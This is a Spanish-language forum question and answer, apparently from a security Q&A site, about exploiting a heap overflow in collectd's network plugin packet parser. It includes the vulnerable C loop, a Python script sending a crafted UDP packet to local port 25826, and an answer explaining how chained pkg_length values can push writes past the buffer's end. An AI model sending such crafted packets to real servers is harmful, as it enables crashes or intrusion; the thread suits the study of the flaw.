Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n));
    status = 0;

    while ((status == 0) && (0 < buffer_size)
            && ((unsigned int) buffer_size > sizeof (part_header_t)))
    {
        uint16_t pkg_length;
        uint16_t pkg_type;

        memcpy ((void *) &pkg_type,
                (void *) buffer,
                sizeof (pkg_type));
        memcpy ((void *) &pkg_length,
                (void *) (buffer + sizeof (pkg_type)),
                sizeof (pkg_length));

        pkg_length = ntohs (pkg_length);
        pkg_type = ntohs (pkg_type);

        if (pkg_length > buffer_size)
            break;
        /* Ensure that this loop terminates eventually */
        if (pkg_length < (2 * sizeof (uint16_t)))
            break;

        if (pkg_type == TYPE_ENCR_AES256)
        {
            status = parse_part_encr_aes256 (se,
                    &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Decrypting AES256 "
                        "part failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
                && (packet_was_encrypted == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unencrypted packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_SIGN_SHA256)
        {
            status = parse_part_sign_sha256 (se,
                                        &buffer, &buffer_size, flags);
            if (status != 0)
            {
                ERROR ("network plugin: Verifying HMAC-SHA-256 "
                        "signature failed "
                        "with status %i.", status);
                break;
            }
        }
#if HAVE_LIBGCRYPT
        else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
                && (packet_was_encrypted == 0)
                && (packet_was_signed == 0))
        {
            if (printed_ignore_warning == 0)
            {
                INFO ("network plugin: Unsigned packet or "
                        "part has been ignored.");
                printed_ignore_warning = 1;
            }
            buffer = ((char *) buffer) + pkg_length;
            continue;
        }
#endif /* HAVE_LIBGCRYPT */
        else if (pkg_type == TYPE_VALUES)
        {
            status = parse_part_values (&buffer, &buffer_size,
                    &vl.values, &vl.values_len);
            if (status != 0)
                break;

            network_dispatch_values (&vl, username);

            sfree (vl.values);
        }
        else if (pkg_type == TYPE_TIME)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
            {
                vl.time = TIME_T_TO_CDTIME_T (tmp);
                n.time  = TIME_T_TO_CDTIME_T (tmp);
            }
        }
        else if (pkg_type == TYPE_TIME_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
            {
                vl.time = (cdtime_t) tmp;
                n.time  = (cdtime_t) tmp;
            }
        }
        else if (pkg_type == TYPE_INTERVAL)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                vl.interval = TIME_T_TO_CDTIME_T (tmp);
        }
        else if (pkg_type == TYPE_INTERVAL_HR)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                vl.interval = (cdtime_t) tmp;
        }
        else if (pkg_type == TYPE_HOST)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.host, sizeof (vl.host));
            if (status == 0)
                sstrncpy (n.host, vl.host, sizeof (n.host));
        }
        else if (pkg_type == TYPE_PLUGIN)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin, sizeof (vl.plugin));
            if (status == 0)
                sstrncpy (n.plugin, vl.plugin,
                        sizeof (n.plugin));
        }
        else if (pkg_type == TYPE_PLUGIN_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.plugin_instance,
                    sizeof (vl.plugin_instance));
            if (status == 0)
                sstrncpy (n.plugin_instance,
                        vl.plugin_instance,
                        sizeof (n.plugin_instance));
        }
        else if (pkg_type == TYPE_TYPE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type, sizeof (vl.type));
            if (status == 0)
                sstrncpy (n.type, vl.type, sizeof (n.type));
        }
        else if (pkg_type == TYPE_TYPE_INSTANCE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    vl.type_instance,
                    sizeof (vl.type_instance));
            if (status == 0)
                sstrncpy (n.type_instance, vl.type_instance,
                        sizeof (n.type_instance));
        }
        else if (pkg_type == TYPE_MESSAGE)
        {
            status = parse_part_string (&buffer, &buffer_size,
                    n.message, sizeof (n.message));

            if (status != 0)
            {
                /* do nothing */
            }
            else if ((n.severity != NOTIF_FAILURE)
                    && (n.severity != NOTIF_WARNING)
                    && (n.severity != NOTIF_OKAY))
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "unknown severity %i.",
                        n.severity);
            }
            else if (n.time <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "time == 0.");
            }
            else if (strlen (n.message) <= 0)
            {
                INFO ("network plugin: "
                        "Ignoring notification with "
                        "an empty message.");
            }
            else
            {
                plugin_dispatch_notification (&n);
            }
        }
        else if (pkg_type == TYPE_SEVERITY)
        {
            uint64_t tmp = 0;
            status = parse_part_number (&buffer, &buffer_size,
                    &tmp);
            if (status == 0)
                n.severity = (int) tmp;
        }
        else
        {
            DEBUG ("network plugin: parse_packet: Unknown part"
                    " type: 0x%04hx", pkg_type);
            buffer = ((char *) buffer) + pkg_length;
        }
    } /* while (buffer_size > sizeof (part_header_t)) */

    if (status == 0 && buffer_size > 0)
        WARNING ("network plugin: parse_packet: Received truncated "
                "packet, try increasing 'MaxPacketSize'");

    return (status);
} /* }}} int parse_packet */

Actualización 2:

Hmmmm ... no go ... estaba intentando desbordar los valores de parse_part_values () pero hay una comprobación de esto:

Hmmmm ... aquí se detiene:

[2017-02-12 16:43:18] complemento de red: parse_part_values: paquete demasiado corto: se espera un fragmento del tamaño 726, pero el búfer solo tiene 51 bytes.

Aquí está el código que produce arriba:

exp.py

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET, # Internet
             socket.SOCK_DGRAM) # UDP

str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"


sock.sendto(str,(UDP_IP, UDP_PORT))

A continuación se muestra un marco desensamblado en Wireshark para el código anterior:

exploit c exploit-development

pregunta android_dev 10.02.2017 - 14:55

fuente

1 respuesta

Lea otras preguntas en las etiquetas exploit c exploit-development

¿Esta transferencia de FTP es segura? ¿Necesito un nuevo cliente FTP? ¿Qué determina el tipo de indicador HTTPS que muestra Chrome? [duplicar]

score 2 · Accepted Answer

Ya que se argumenta que es un desbordamiento del montón, asumo que el buffer está en el montón. Y eso es lo que sugiere la solución que el enlace sugiere.

El problema es que pkg_length se toma del búfer, que es un paquete de red que, por lo tanto, es suministrado por un cliente que se conecta:

memcpy ((void *) &pkg_length,
        (void *) (buffer + sizeof (pkg_type)),
        sizeof (pkg_length));

Ese uint16 puede configurarse para lo que quiera la persona que envíe el paquete. Ahora, con bastante frecuencia se realiza lo siguiente:

buffer = ((char *) buffer) + pkg_length;

Lo que está bien a menos que sea pkg_length > buffer_size , pero al principio hay una comprobación:

if (pkg_length > buffer_size)
    break;

El problema comienza con el hecho de que puede haber más de un paquete en el búfer, ya que tenemos un bucle while sobre él. Segundo, tenemos todas esas funciones parse_* actualizando buffer_size , pero no se pasan pkg_size . Estas funciones solo pueden saber qué analizaron y actualizar buffer_size en consecuencia.

Entonces, en el primer paquete enviamos un enorme pkg_length (que aún es más pequeño que buffer_size ) y avanzamos el buffer hacia adelante. Luego, en un segundo o tercer paquete (o más) podemos agregar pkg_length que es más grande que el resto del búfer pero aún más pequeño que buffer_size . Esto nos permitirá escribir después del final del búfer.